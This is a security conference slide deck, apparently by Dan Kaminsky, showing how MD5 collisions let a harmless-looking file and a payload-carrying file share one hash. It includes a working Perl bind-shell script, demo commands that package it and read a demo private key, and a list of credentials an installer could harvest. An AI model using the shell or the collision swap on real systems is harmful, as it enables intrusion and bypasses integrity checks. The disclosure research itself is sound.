SlideShare ist ein Scribd-Unternehmen logo
1 von 35
Downloaden Sie, um offline zu lesen
MD5 To Be Considered Harmful
(Someday)
Dan Kaminsky
Basics
 MD5: Hashing algorithm
– “Fingerprint” of data – easy to synthesize (push
here), hard to fake (grow this)
– Known since 1997 it was theoretically not so hard to
create two different sets of data with the same hash
– Recently: Not so theoretical
 All they released: The two sets of data (“vectors”)
Limitations
 Poor understanding of how to actually exploit the MD5
collision
– Collision mechanism unreleased
– Collisions only creatable between two specially designed sets
of data – not a general purpose attack
 Same output as the birthday attack. So, if birthday dropped
MD5 security to 2^64 (which we’ve said for years), Wang
dropped MD5 security to 2^24-2^32. Ouch.
– Summary: A fundamental constraint of the system has been
violated…but what this means is unclear
The Question
 Is it possible, with nothing but the two vectors
with matching MD5 hashes, to find an applied
security risk?
– Answer: Yes.
– Caveats: This is early. This is rudimentary. This is
not the BIC Pen to the tubular lock of MD5. But it’s
interesting.
The Thesis
 MD5 presents functionally weaker security
constraints than the cryptographically secure hash
primitive offers in general, and SHA-1 in particular.
 1. MD5 hashes can no longer imply the behavior of
executable data
– If md5(exe1) == md5(exe2), behavior(exe1) ?= behavior(exe2)
– “Stripwire”, C(CC|NN)
 2. MD5 hashes can no longer imply the information
equivalence of datasets
– If md5(data1) == md5(data2),
information(data1) ?= information(data2)
– P2P attacks
How MD5 Works
 MD5 is a block-based algorithm
– Start with a 128 bit system state (arbitrary)
– Stir in 512 bits of data
– Repeat until no more data
– End up with 128 bits, all stirred up
 Security is provided by the difficulty of figuring
out how to precisely stir the initial state
A Curious Trait of Block Based
Hashes
 If two files have the same hash, then two files
appended with the same data also have the same hash
– if md5(x) == md5(y)
then md5(x+q) == md5(y+q)
 Assuming length(x) mod 64 == 0
– The information of the two files’ difference was lost in the
stirring
– This is a well known trait among those who work with block-
based algorithms
Definitions
 vec1, vec2
– Our two files (“vectors”) with the exact same hash
 Payload
– A set of commands to do “stuff”.
 Encrypted Payload
– Payload encrypted using the SHA-1 hash of vec1 as
a key
In Fire and Ice
 Two Files: Fire and Ice
– Fire = vec1 and Encrypted Payload
– Ice = vec2 and Encrypted Payload
 Fire contains sufficient context to be decrypted and
executed
– Key=sha1(vec1), which decrypts the payload
 Ice doesn’t contain vec1, so there’s insufficient context
to decrypt the payload
– The payload is frozen.
The Other Shoe Drops
 Fire and Ice have the same MD5 hash.
 md5(x+q) == md5(y+q)
– x = vec1
– y = vec2
– q = encrypted payload
 Fire executes an arbitrary series of commands
 Ice resists reverse engineering with the
strength of the encryption algorithm (AES)
Demo[0]: The Vectors
 $vec1 = h2b(“
d1 31 dd 02 c5 e6 ee c4 69 3d 9a 06 98 af f9 5c
2f ca b5 87 12 46 7e ab 40 04 58 3e b8 fb 7f 89
55 ad 34 06 09 f4 b3 02 83 e4 88 83 25 71 41 5a
08 51 25 e8 f7 cd c9 9f d9 1d bd f2 80 37 3c 5b
d8 82 3e 31 56 34 8f 5b ae 6d ac d4 36 c9 19 c6
dd 53 e2 b4 87 da 03 fd 02 39 63 06 d2 48 cd a0
e9 9f 33 42 0f 57 7e e8 ce 54 b6 70 80 a8 0d 1e
c6 98 21 bc b6 a8 83 93 96 f9 65 2b 6f f7 2a 70”);
 $vec2 = h2b(“
d1 31 dd 02 c5 e6 ee c4 69 3d 9a 06 98 af f9 5c
2f ca b5 07 12 46 7e ab 40 04 58 3e b8 fb 7f 89
55 ad 34 06 09 f4 b3 02 83 e4 88 83 25 f1 41 5a
08 51 25 e8 f7 cd c9 9f d9 1d bd 72 80 37 3c 5b
d8 82 3e 31 56 34 8f 5b ae 6d ac d4 36 c9 19 c6
dd 53 e2 34 87 da 03 fd 02 39 63 06 d2 48 cd a0
e9 9f 33 42 0f 57 7e e8 ce 54 b6 70 80 28 0d 1e
c6 98 21 bc b6 a8 83 93 96 f9 65 ab 6f f7 2a 70”);
Demo[1]: Equivalence
 $ md5sum.exe vec1 vec2; sha1sum.exe vec1 vec2
79054025255fb1a26e4bc422aef54eb4 *vec1
79054025255fb1a26e4bc422aef54eb4 *vec2
a34473cf767c6108a5751a20971f1fdfba97690a *vec1
4283dd2d70af1ad3c2d5fdc917330bf502035658 *vec2
Demo[2]: Still The Same
 $ dd if=/dev/urandom bs=1024 count=1024 >
arbitrary_data
1024+0 records in
1024+0 records out
 $ cat vec1 arbitrary_data > v1_arb
$ cat vec2 arbitrary_data > v2_arb
 $ md5sum.exe v1_arb v2_arb; sha1sum.exe v1_arb v2_arb
e9b26b1b200e1c848196b264d4589174 *v1_arb
e9b26b1b200e1c848196b264d4589174 *v2_arb
7a7961d6f31dada14f1f20290754c49860c22da4 *v1_arb
466dff783f129c668419cbaa180a5c67b8ace03d *v2_arb
 But they still differ at the start.
Demo[3]: Our Payload
 $ cat backlash.pl
#!/usr/bin/perl
# Backlash: Open a pseudoshell on port 50023
# Author: Samy Kamkar, www.lucidx.com
use IO;
while(1){
while($c=new IO::Socket::INET(LocalPort,
50023,Reuse,1,Listen)->accept){
$~->fdopen($c,w);
STDIN->fdopen($c,r);
system$_ while<>;
}
}
Demo[4]: Packaging The Payload
 $ ./stripwire.pl -v -b backlash.pl
fire.bin: md5 = 4df01ec3a18df7d7d6cdf8e16e98cd99
ice.bin: md5 = 4df01ec3a18df7d7d6cdf8e16e98cd99
fire.bin: sha1 =
a7f6ebb805ac595e4553f84cb9ec40865cc11e08
ice.bin: sha1 =
85f602de91440cd877c7393f2a58b5f0d72cbc35
Demo[5]: Altered Behavior, Same
Hash
 $ ./stripwire.pl -v -r ice.bin
Unable to decrypt file: ice.bin
$ ./stripwire.pl -v -r fire.bin &
$ telnet 127.0.0.1 50023
Trying 127.0.0.1...
Connected to 127.0.0.1.
Escape character is '^]'.
cat /etc/ssh_host_dsa_key_demo
-----BEGIN DSA PRIVATE KEY-----
MIH5AgEAAkEAlcTshGgpYY0eQgRBJRyQCrBDgXhFWFTbxazsgbrKie
bh1aal4ET6vPYZ7/OlPbrKxwMnX5mcEHywmEhOcK00pwIVAJyQ0Zlk
pRPr2eJWz/ECgr1XgUvPAkBWeUy6MJHApO5sF+T0V7vs319fGvw0j8
dthueQ2pAZHJl063SC2n9JkaMZRHEnJ7c0
4xMEHnFdmIvxTNFCavKZAkEAieVtNTFNNV7SIf0m4z60mJ1Hz3zj50
R7ih1SSxPon+IxzKsoAEP9JkyjS67+HBQGpowxNuukOFaqDwl1gclG
fwIVAJuPpSn6yj2ez5m7aTzZ7-----END DSA PRIVATE KEY-----
Is Tripwire Dead?
 Short Answer: No.
– “The Externality Argument”: Executable behavior is not
entirely specified by file data
 Hardware Characteristics (CPU, Temp)
 File Metadata (Name, Date)
 Network Metadata (DNS searchlist, IP)
 Memory-Only Exploits
 Random Number Generator
 Network Activity (ET Phone Home)
– “The Infallible Auditor Argument”: Ice must be trusted before
Fire may be swapped in
 “But why are you trusting ice?”
Does Tripwire Have A Problem?
 Short Answer: Yes
– The “Externality Argument”
 “Why not just have the application download new code to run?”
 Yes. Commands can be gotten from outside the MD5-hashed
dataset. No hashing algorithm can verify the integrity of data it’s
not hashing. But MD5 is failing to verify the integrity of data it is
hashing.
– The “Infallible Auditor Argument”
 “Who would trust ice?”
 That another defense will, hopefully, prevent the MD5 failure from
being exploited does not mean the MD5 failure has not brought
us closer to exploitability
– Black box testing will never detect that Ice can become Fire – and
there is another failure mode…
On The Power Of Auditors[0]
 Halting Problem limits ability of auditors
– Obfuscatory capabilities are great – couple bit difference
allows for the envelopment of payload in AES shell
 Encrypted data and compressed data have near-identical entropy
profiles – embedded compressed content common
 Can also embed a JPEG containing steganographically encoded
instructions
– If I can “trick” an auditor into trusting something that will never
actually do any damage, no matter what the inputs or outputs
happen to be, then I can later swap that perfectly harmless
executable for one with arbitrary behavior
 This is new.
On The Power Of Auditors[1]
 Diffie-Helman Prime Conflation
– Significant because there’s nothing for an auditor to detect, but
the failure critically defeats a cryptographic subsystem
 Discovered by John Kelsey, verified by Ben Laurie
– DH requires prime moduli
– Vec1 || 0000000000000000000000000000001B
is prime
– Vec2 || 0000000000000000000000000000001B
is not prime
– Send Vec1 set to auditor – impossible to detect that vec2 can
be swapped in to destroy the cryptosystem
Applied Failure Scenarios
 Auditor Bypass
– Developers send one payload to testers, another to factory
– Developers can be seen as auditors too – infect the build tools,
only what gets shipped gets infected. Developers can’t use
MD5 hash to verify equivalence between sent and shipped.
 Distributed Package Management
– MD5 hashes are centrally distributed, along with mirror lists.
Files acquired from mirrors are tested against MD5 hash. If
match, install.
– Mirrors can send Ice to central package manager and Fire to
whoever they like
Bit Commitment Also Falls
 Bit Commitment (Slashdotter)
– Alice sends Bob MD5 hash of data, “committing” her
to some dataset
– Bob makes bets based on what he guesses Alice
has
– Intended Behavior: Bob registers bets, Alice sends
data, Bob verifies hash, Alice pays off bets
– New Behavior: Bob registers bets, Alice selects
dataset where she wins, Bob verifies hash, Alice
doesn’t pay
The (Still Secret) Actual Attack
 Everything we’ve done has been with just the test
vectors
– Append only, single bit of information
 Actual attack is much more powerful
– Adjusts to any state of the MD5 machine
 Can now both append and prepend w/o changing final hash
 Fire.exe and Ice.exe – no execution harness required
– Can create any number of swappable collisions – actually
relatively fast to do so (Joux’s insight)
 “Doppelganger” blocks – they may exist anywhere within a
file, and may be swapped out for one another without
altering the ultimate MD5 hash
HMAC: Not Completely
Invulnerable
 HMAC algorithm:
– Inner = MD5(Key XOR 0x36 + Data)
– Outer = MD5(Key XOR 0x5c + Inner)
– HMAC-MD5 = Outer
 Been said this is totally immune. It’s not.
– Actual attack adapts to any initial state. Inner creates a new
initial state that Data is integrated into. If attacker knows Key,
can create colliding data
– Would be impossible if Data was double-hashed in both Inner
and Outer loop – would have to adapt Data to two different
initial states
HMAC: Arguably Invulnerable
Enough
 MAC Primitive is allowed to collapse when key is
known.
– Most other MACs do
– This completely obviates most applied risks
 Still worth noting…
– We’ve never been able to create an HMAC-MD5 collision
before, key or not.
– HMAC-MD5 has degraded in a way HMAC-SHA1 has not.
– Microsoft X-BOX signs HMAC-SHA1. There are thus
deployed products that desire both collision resistance and
MAC properties.
 Digital signatures completely vulnerable
Bits and Pieces
 Vec1 vs. Vec2 = A Single Bit Of Information
 Suppose we can calculate multicollisions
– 2 collisions = 1 bit (2^1), 4 collisions = 2 bits (2^2), 256
collisions = 8 bits (2^8)
– Note it gets more and more expensive to add bits this way
 Remember we aren’t tied to the default initial state of
MD5
– We can chain sets of doppelgangers together
– Data capacity is summed across every set
– 16 blocks, each adapting to emitted state of the last, each with
256 possibilities, yields 128 bits
MD5 Steganography
 Data can be embedded within a supposedly
“constant” file that actually changes, with MD5
unable to see those changes
– CRC-32 and TCP/IP checksums vulnerable to this
too
– But MD5 promises computational infeasibility – “this
is the exact same data you hashed back then”
 It doesn’t have to be.
 Defense against malicious intent part of the MD5 mandate
P2P Yeah You Know Me
 MP3
– MP3 players skip over “garbage blocks”
 vec1/vec2 or our doppelganger set
– P2P tools commonly distribute MP3’s; use hashes to organize
this distribution
 Searching – Hashes coalesce identical content
 Verifying – Hashes guarantee what was searched for is what was
downloaded
 Note: I’m not taking sides. I’m demonstrating broken
applications.
– Possible to prepend each MP3 with a 128 bit multi-
doppelganger set, without breaking search or violating integrity
 Allows tracing 3rd generation downloads to 2nd uploads
Execute Able
 Limit of MP3 tracing: Can only get back what you put
in
– MP3 decoders not Turing complete (sans major exploit)
– Software installers are, though
 Installer Strikeback: Installer self-modifies w/
fingerprint of host it’s being installed on
– Instead of trying to trick the attacker into “phoning home” (say
with DNS), piggyback on their inevitable generosity to share n
most valuable bits
– Can also work multi-generation – i.e. mutate as distributed
along a P2P network, and the net won’t notice / complain
Personal Identifiers
 Stuff to get
– Network data -- IP address, DNS name, default name server, MAC
address
– Browser Cookies, Caches, and Password Stores -- Online Banking,
Hotmail, Amazon 1-Click
– Cached Instant Messenger Credentials -- Yahoo, AOL IM, MSN,
Trillian
– P2P Memberships -- KaZaA, Gnutella2
– Corporate Identifiers -- VPN Client Data / Logs
– Shipped Material -- CPU ID, Vendor ID, Windows Activation Key
– System Configurations -- Time Zone, Telephone API area code
– Wireless Data -- MAC addresses of local access points
– Existence Tests -- Special files in download directory
The Caveat
 None of this works w/o the actual attack
– Can’t make new doppelganger blocks
– Can’t chain from anything but default MD5 initial
state
– 
 Are we lost?
– No – thank you KaZaA
Packing the kzhash
 Kzhash – custom hashing mode using MD5
– Based on Merkle’s Tiger Trees
– Not the standard “magnet”/TTH links
– First half = MD5(first 300K of file)
– Second half = All proceeding 32K chunks
 Two benefits
– Able to distribute hashing load across time to download, even
with out of order data acquisition
– Able to efficiently calculate integrity-verifying sums for partial
datasets
Smoking the kzhash
 Restarting the hash every 32K ==
Hash begins from initial state every 32K ==
Hash begins from vec1/vec2 state every 32K ==
We can embed one bit every 32K
 Specifics
– Vec1 and Vec2 are 128 bytes apiece (0.09% efficiency, wow)
– 32768-128=32640 bytes of payload
 Only 0.4% data expansion
 MP3: Average size == 4.5MB => 4.2MB of 32K chunks => 134
bits of KaZaA-stego per MP3 today
 Apps: Average size == 60MB => 1920 bits
– Added space offset by need for redundancy – larger the file, more
hosts may serve 32K chunks
Kzhash Demo
 #setup
dd if=/dev/urandom of=foo bs=32640 
count=1
cat vec1 foo > 1
cat vec2 foo > 0
 $ cat 1 1 0 1 1 0 1 0 | perl kzhash.pl
76b5764721b8911cf227066e11837142
$ cat 0 0 0 0 1 1 1 1 | perl kzhash.pl
76b5764721b8911cf227066e11837142
 Works today.
Conclusion
 We’ve known MD5 was weak for a very long
time
– 1997 was the first brick to fall
– More will come
 USE SHA-1! 

Weitere ähnliche Inhalte

Was ist angesagt?

Pulmonary arterial hypertension
Pulmonary arterial hypertensionPulmonary arterial hypertension
Pulmonary arterial hypertensionUNICAH
 
SDE to SPS (Synergi Pipeline Simulator) - Spatial Data to Text
SDE to SPS (Synergi Pipeline Simulator) - Spatial Data to TextSDE to SPS (Synergi Pipeline Simulator) - Spatial Data to Text
SDE to SPS (Synergi Pipeline Simulator) - Spatial Data to TextSafe Software
 
Delete completely pm_data
Delete completely pm_dataDelete completely pm_data
Delete completely pm_dataPiyush Bose
 
Fb08 how to reverse a document in sap t code
Fb08     how to reverse a document in sap t codeFb08     how to reverse a document in sap t code
Fb08 how to reverse a document in sap t codeAmith Sanghvi
 
Postoperative Pulmonary Hypertension in Children with Congenital Heart Diseas...
Postoperative Pulmonary Hypertension in Children with Congenital Heart Diseas...Postoperative Pulmonary Hypertension in Children with Congenital Heart Diseas...
Postoperative Pulmonary Hypertension in Children with Congenital Heart Diseas...KararSurgery
 
SAP Certification books and exam dump
SAP Certification books and exam dumpSAP Certification books and exam dump
SAP Certification books and exam dumpERP Training
 
Pulmonary arterial hypertension in congenital heart disease
Pulmonary arterial hypertension in congenital heart disease Pulmonary arterial hypertension in congenital heart disease
Pulmonary arterial hypertension in congenital heart disease Ramachandra Barik
 
Adding custom fields to the fi report fbl5 n using bt es
Adding custom fields to the fi report fbl5 n using bt esAdding custom fields to the fi report fbl5 n using bt es
Adding custom fields to the fi report fbl5 n using bt esKranthi Kumar
 

Was ist angesagt? (15)

Pulmonary arterial hypertension
Pulmonary arterial hypertensionPulmonary arterial hypertension
Pulmonary arterial hypertension
 
Business Area in SAP FI
Business Area in SAP FIBusiness Area in SAP FI
Business Area in SAP FI
 
Valuated Goods Receipt
Valuated Goods ReceiptValuated Goods Receipt
Valuated Goods Receipt
 
Asset purchase
Asset purchaseAsset purchase
Asset purchase
 
ERP
ERPERP
ERP
 
SDE to SPS (Synergi Pipeline Simulator) - Spatial Data to Text
SDE to SPS (Synergi Pipeline Simulator) - Spatial Data to TextSDE to SPS (Synergi Pipeline Simulator) - Spatial Data to Text
SDE to SPS (Synergi Pipeline Simulator) - Spatial Data to Text
 
Delete completely pm_data
Delete completely pm_dataDelete completely pm_data
Delete completely pm_data
 
Fb08 how to reverse a document in sap t code
Fb08     how to reverse a document in sap t codeFb08     how to reverse a document in sap t code
Fb08 how to reverse a document in sap t code
 
SAP Inbound IDoc.pptx
SAP Inbound IDoc.pptxSAP Inbound IDoc.pptx
SAP Inbound IDoc.pptx
 
SAP – Non Stock Materials (NLAG)
SAP – Non Stock Materials (NLAG)SAP – Non Stock Materials (NLAG)
SAP – Non Stock Materials (NLAG)
 
Postoperative Pulmonary Hypertension in Children with Congenital Heart Diseas...
Postoperative Pulmonary Hypertension in Children with Congenital Heart Diseas...Postoperative Pulmonary Hypertension in Children with Congenital Heart Diseas...
Postoperative Pulmonary Hypertension in Children with Congenital Heart Diseas...
 
SAP Certification books and exam dump
SAP Certification books and exam dumpSAP Certification books and exam dump
SAP Certification books and exam dump
 
Pulmonary arterial hypertension in congenital heart disease
Pulmonary arterial hypertension in congenital heart disease Pulmonary arterial hypertension in congenital heart disease
Pulmonary arterial hypertension in congenital heart disease
 
Adding custom fields to the fi report fbl5 n using bt es
Adding custom fields to the fi report fbl5 n using bt esAdding custom fields to the fi report fbl5 n using bt es
Adding custom fields to the fi report fbl5 n using bt es
 
Unusual Presentation of Takayasu Arteritis
Unusual Presentation of Takayasu ArteritisUnusual Presentation of Takayasu Arteritis
Unusual Presentation of Takayasu Arteritis
 

Andere mochten auch

Bh us-02-kaminsky-blackops
Bh us-02-kaminsky-blackopsBh us-02-kaminsky-blackops
Bh us-02-kaminsky-blackopsDan Kaminsky
 
Bh fed-03-kaminsky
Bh fed-03-kaminskyBh fed-03-kaminsky
Bh fed-03-kaminskyDan Kaminsky
 
Black ops of tcp2005 japan
Black ops of tcp2005 japanBlack ops of tcp2005 japan
Black ops of tcp2005 japanDan Kaminsky
 
Yet Another Dan Kaminsky Talk (Black Ops 2014)
Yet Another Dan Kaminsky Talk (Black Ops 2014)Yet Another Dan Kaminsky Talk (Black Ops 2014)
Yet Another Dan Kaminsky Talk (Black Ops 2014)Dan Kaminsky
 
I Want These * Bugs Off My * Internet
I Want These * Bugs Off My * InternetI Want These * Bugs Off My * Internet
I Want These * Bugs Off My * InternetDan Kaminsky
 

Andere mochten auch (16)

Bh us-02-kaminsky-blackops
Bh us-02-kaminsky-blackopsBh us-02-kaminsky-blackops
Bh us-02-kaminsky-blackops
 
Dmk blackops2006
Dmk blackops2006Dmk blackops2006
Dmk blackops2006
 
Dmk bo2 k7_web
Dmk bo2 k7_webDmk bo2 k7_web
Dmk bo2 k7_web
 
Dmk neut toor
Dmk neut toorDmk neut toor
Dmk neut toor
 
Interpolique
InterpoliqueInterpolique
Interpolique
 
Bh fed-03-kaminsky
Bh fed-03-kaminskyBh fed-03-kaminsky
Bh fed-03-kaminsky
 
Bh eu 05-kaminsky
Bh eu 05-kaminskyBh eu 05-kaminsky
Bh eu 05-kaminsky
 
Black ops of tcp2005 japan
Black ops of tcp2005 japanBlack ops of tcp2005 japan
Black ops of tcp2005 japan
 
Confidence web
Confidence webConfidence web
Confidence web
 
Dmk bo2 k8_bh_fed
Dmk bo2 k8_bh_fedDmk bo2 k8_bh_fed
Dmk bo2 k8_bh_fed
 
Dmk shmoo2007
Dmk shmoo2007Dmk shmoo2007
Dmk shmoo2007
 
Dmk bo2 k8
Dmk bo2 k8Dmk bo2 k8
Dmk bo2 k8
 
Black opspki 2
Black opspki 2Black opspki 2
Black opspki 2
 
Yet Another Dan Kaminsky Talk (Black Ops 2014)
Yet Another Dan Kaminsky Talk (Black Ops 2014)Yet Another Dan Kaminsky Talk (Black Ops 2014)
Yet Another Dan Kaminsky Talk (Black Ops 2014)
 
Advanced open ssh
Advanced open sshAdvanced open ssh
Advanced open ssh
 
I Want These * Bugs Off My * Internet
I Want These * Bugs Off My * InternetI Want These * Bugs Off My * Internet
I Want These * Bugs Off My * Internet
 

Ähnlich wie 232 md5-considered-harmful-slides

WiFi practical hacking "Show me the passwords!"
WiFi practical hacking "Show me the passwords!"WiFi practical hacking "Show me the passwords!"
WiFi practical hacking "Show me the passwords!"DefCamp
 
Jose Selvi - Side-Channels Uncovered [rootedvlc2018]
Jose Selvi - Side-Channels Uncovered [rootedvlc2018]Jose Selvi - Side-Channels Uncovered [rootedvlc2018]
Jose Selvi - Side-Channels Uncovered [rootedvlc2018]RootedCON
 
Cryptography (under)engineering
Cryptography (under)engineeringCryptography (under)engineering
Cryptography (under)engineeringslicklash
 
On Mining Bitcoins - Fundamentals & Outlooks
On Mining Bitcoins - Fundamentals & OutlooksOn Mining Bitcoins - Fundamentals & Outlooks
On Mining Bitcoins - Fundamentals & OutlooksFilip Maertens
 
Pepe Vila - Cache and Syphilis [rooted2019]
Pepe Vila - Cache and Syphilis [rooted2019]Pepe Vila - Cache and Syphilis [rooted2019]
Pepe Vila - Cache and Syphilis [rooted2019]RootedCON
 
Sourcefire Vulnerability Research Team Labs
Sourcefire Vulnerability Research Team LabsSourcefire Vulnerability Research Team Labs
Sourcefire Vulnerability Research Team Labslosalamos
 
Intro to Rust from Applicative / NY Meetup
Intro to Rust from Applicative / NY MeetupIntro to Rust from Applicative / NY Meetup
Intro to Rust from Applicative / NY Meetupnikomatsakis
 
Building your own NSQL store
Building your own NSQL storeBuilding your own NSQL store
Building your own NSQL storeEdward Capriolo
 
Nibiru: Building your own NoSQL store
Nibiru: Building your own NoSQL storeNibiru: Building your own NoSQL store
Nibiru: Building your own NoSQL storeEdward Capriolo
 
Nibiru: Building your own NoSQL store
Nibiru: Building your own NoSQL storeNibiru: Building your own NoSQL store
Nibiru: Building your own NoSQL storeEdward Capriolo
 
Image Recognition on Streaming Data
Image Recognition  on Streaming DataImage Recognition  on Streaming Data
Image Recognition on Streaming DataSingleStore
 
Ben Coverston - The Apache Cassandra Project
Ben Coverston - The Apache Cassandra ProjectBen Coverston - The Apache Cassandra Project
Ben Coverston - The Apache Cassandra ProjectMorningstar Tech Talks
 
Chasing the Adder. A tale from the APT world...
Chasing the Adder. A tale from the APT world...Chasing the Adder. A tale from the APT world...
Chasing the Adder. A tale from the APT world...Stefano Maccaglia
 
DEF CON 23 - Phillip Aumasson - quantum computers vs computers security
DEF CON 23 - Phillip Aumasson - quantum computers vs computers securityDEF CON 23 - Phillip Aumasson - quantum computers vs computers security
DEF CON 23 - Phillip Aumasson - quantum computers vs computers securityFelipe Prado
 
A Cassandra + Solr + Spark Love Triangle Using DataStax Enterprise
A Cassandra + Solr + Spark Love Triangle Using DataStax EnterpriseA Cassandra + Solr + Spark Love Triangle Using DataStax Enterprise
A Cassandra + Solr + Spark Love Triangle Using DataStax EnterprisePatrick McFadin
 
Varnish in action phpuk11
Varnish in action phpuk11Varnish in action phpuk11
Varnish in action phpuk11Combell NV
 
Beyond the Query: A Cassandra + Solr + Spark Love Triangle Using Datastax Ent...
Beyond the Query: A Cassandra + Solr + Spark Love Triangle Using Datastax Ent...Beyond the Query: A Cassandra + Solr + Spark Love Triangle Using Datastax Ent...
Beyond the Query: A Cassandra + Solr + Spark Love Triangle Using Datastax Ent...DataStax Academy
 
Velocity 2012 - Learning WebOps the Hard Way
Velocity 2012 - Learning WebOps the Hard WayVelocity 2012 - Learning WebOps the Hard Way
Velocity 2012 - Learning WebOps the Hard WayCosimo Streppone
 

Ähnlich wie 232 md5-considered-harmful-slides (20)

WiFi practical hacking "Show me the passwords!"
WiFi practical hacking "Show me the passwords!"WiFi practical hacking "Show me the passwords!"
WiFi practical hacking "Show me the passwords!"
 
Move Over, Rsync
Move Over, RsyncMove Over, Rsync
Move Over, Rsync
 
Jose Selvi - Side-Channels Uncovered [rootedvlc2018]
Jose Selvi - Side-Channels Uncovered [rootedvlc2018]Jose Selvi - Side-Channels Uncovered [rootedvlc2018]
Jose Selvi - Side-Channels Uncovered [rootedvlc2018]
 
Cryptography (under)engineering
Cryptography (under)engineeringCryptography (under)engineering
Cryptography (under)engineering
 
On Mining Bitcoins - Fundamentals & Outlooks
On Mining Bitcoins - Fundamentals & OutlooksOn Mining Bitcoins - Fundamentals & Outlooks
On Mining Bitcoins - Fundamentals & Outlooks
 
Pepe Vila - Cache and Syphilis [rooted2019]
Pepe Vila - Cache and Syphilis [rooted2019]Pepe Vila - Cache and Syphilis [rooted2019]
Pepe Vila - Cache and Syphilis [rooted2019]
 
Sourcefire Vulnerability Research Team Labs
Sourcefire Vulnerability Research Team LabsSourcefire Vulnerability Research Team Labs
Sourcefire Vulnerability Research Team Labs
 
Intro to Rust from Applicative / NY Meetup
Intro to Rust from Applicative / NY MeetupIntro to Rust from Applicative / NY Meetup
Intro to Rust from Applicative / NY Meetup
 
Building your own NSQL store
Building your own NSQL storeBuilding your own NSQL store
Building your own NSQL store
 
Nibiru: Building your own NoSQL store
Nibiru: Building your own NoSQL storeNibiru: Building your own NoSQL store
Nibiru: Building your own NoSQL store
 
Nibiru: Building your own NoSQL store
Nibiru: Building your own NoSQL storeNibiru: Building your own NoSQL store
Nibiru: Building your own NoSQL store
 
Image Recognition on Streaming Data
Image Recognition  on Streaming DataImage Recognition  on Streaming Data
Image Recognition on Streaming Data
 
Ben Coverston - The Apache Cassandra Project
Ben Coverston - The Apache Cassandra ProjectBen Coverston - The Apache Cassandra Project
Ben Coverston - The Apache Cassandra Project
 
Chasing the Adder. A tale from the APT world...
Chasing the Adder. A tale from the APT world...Chasing the Adder. A tale from the APT world...
Chasing the Adder. A tale from the APT world...
 
DEF CON 23 - Phillip Aumasson - quantum computers vs computers security
DEF CON 23 - Phillip Aumasson - quantum computers vs computers securityDEF CON 23 - Phillip Aumasson - quantum computers vs computers security
DEF CON 23 - Phillip Aumasson - quantum computers vs computers security
 
A Cassandra + Solr + Spark Love Triangle Using DataStax Enterprise
A Cassandra + Solr + Spark Love Triangle Using DataStax EnterpriseA Cassandra + Solr + Spark Love Triangle Using DataStax Enterprise
A Cassandra + Solr + Spark Love Triangle Using DataStax Enterprise
 
Varnish in action phpuk11
Varnish in action phpuk11Varnish in action phpuk11
Varnish in action phpuk11
 
Beyond the Query: A Cassandra + Solr + Spark Love Triangle Using Datastax Ent...
Beyond the Query: A Cassandra + Solr + Spark Love Triangle Using Datastax Ent...Beyond the Query: A Cassandra + Solr + Spark Love Triangle Using Datastax Ent...
Beyond the Query: A Cassandra + Solr + Spark Love Triangle Using Datastax Ent...
 
Velocity 2012 - Learning WebOps the Hard Way
Velocity 2012 - Learning WebOps the Hard WayVelocity 2012 - Learning WebOps the Hard Way
Velocity 2012 - Learning WebOps the Hard Way
 
Garbled Circuits for Secure Credential Management Services
Garbled Circuits for Secure Credential Management ServicesGarbled Circuits for Secure Credential Management Services
Garbled Circuits for Secure Credential Management Services
 

Mehr von Dan Kaminsky

Bugs Aren't Random
Bugs Aren't RandomBugs Aren't Random
Bugs Aren't RandomDan Kaminsky
 
Wo defensive trickery_13mar2017
Wo defensive trickery_13mar2017Wo defensive trickery_13mar2017
Wo defensive trickery_13mar2017Dan Kaminsky
 
Move Fast and Fix Things
Move Fast and Fix ThingsMove Fast and Fix Things
Move Fast and Fix ThingsDan Kaminsky
 
A Technical Dive into Defensive Trickery
A Technical Dive into Defensive TrickeryA Technical Dive into Defensive Trickery
A Technical Dive into Defensive TrickeryDan Kaminsky
 
Chicken Chicken Chicken Chicken
Chicken Chicken Chicken ChickenChicken Chicken Chicken Chicken
Chicken Chicken Chicken ChickenDan Kaminsky
 
Some Thoughts On Bitcoin
Some Thoughts On BitcoinSome Thoughts On Bitcoin
Some Thoughts On BitcoinDan Kaminsky
 
Black Ops of TCP/IP 2011 (Black Hat USA 2011)
Black Ops of TCP/IP 2011 (Black Hat USA 2011)Black Ops of TCP/IP 2011 (Black Hat USA 2011)
Black Ops of TCP/IP 2011 (Black Hat USA 2011)Dan Kaminsky
 
Showing How Security Has (And Hasn't) Improved, After Ten Years Of Trying
Showing How Security Has (And Hasn't) Improved, After Ten Years Of TryingShowing How Security Has (And Hasn't) Improved, After Ten Years Of Trying
Showing How Security Has (And Hasn't) Improved, After Ten Years Of TryingDan Kaminsky
 
Domain Key Infrastructure (From Black Hat USA)
Domain Key Infrastructure (From Black Hat USA)Domain Key Infrastructure (From Black Hat USA)
Domain Key Infrastructure (From Black Hat USA)Dan Kaminsky
 
Dmk sb2010 web_defense
Dmk sb2010 web_defenseDmk sb2010 web_defense
Dmk sb2010 web_defenseDan Kaminsky
 

Mehr von Dan Kaminsky (18)

Bugs Aren't Random
Bugs Aren't RandomBugs Aren't Random
Bugs Aren't Random
 
Wo defensive trickery_13mar2017
Wo defensive trickery_13mar2017Wo defensive trickery_13mar2017
Wo defensive trickery_13mar2017
 
Move Fast and Fix Things
Move Fast and Fix ThingsMove Fast and Fix Things
Move Fast and Fix Things
 
A Technical Dive into Defensive Trickery
A Technical Dive into Defensive TrickeryA Technical Dive into Defensive Trickery
A Technical Dive into Defensive Trickery
 
Chicken
ChickenChicken
Chicken
 
Chicken Chicken Chicken Chicken
Chicken Chicken Chicken ChickenChicken Chicken Chicken Chicken
Chicken Chicken Chicken Chicken
 
Black ops 2012
Black ops 2012Black ops 2012
Black ops 2012
 
Some Thoughts On Bitcoin
Some Thoughts On BitcoinSome Thoughts On Bitcoin
Some Thoughts On Bitcoin
 
Black Ops of TCP/IP 2011 (Black Hat USA 2011)
Black Ops of TCP/IP 2011 (Black Hat USA 2011)Black Ops of TCP/IP 2011 (Black Hat USA 2011)
Black Ops of TCP/IP 2011 (Black Hat USA 2011)
 
Showing How Security Has (And Hasn't) Improved, After Ten Years Of Trying
Showing How Security Has (And Hasn't) Improved, After Ten Years Of TryingShowing How Security Has (And Hasn't) Improved, After Ten Years Of Trying
Showing How Security Has (And Hasn't) Improved, After Ten Years Of Trying
 
Domain Key Infrastructure (From Black Hat USA)
Domain Key Infrastructure (From Black Hat USA)Domain Key Infrastructure (From Black Hat USA)
Domain Key Infrastructure (From Black Hat USA)
 
Interpolique
InterpoliqueInterpolique
Interpolique
 
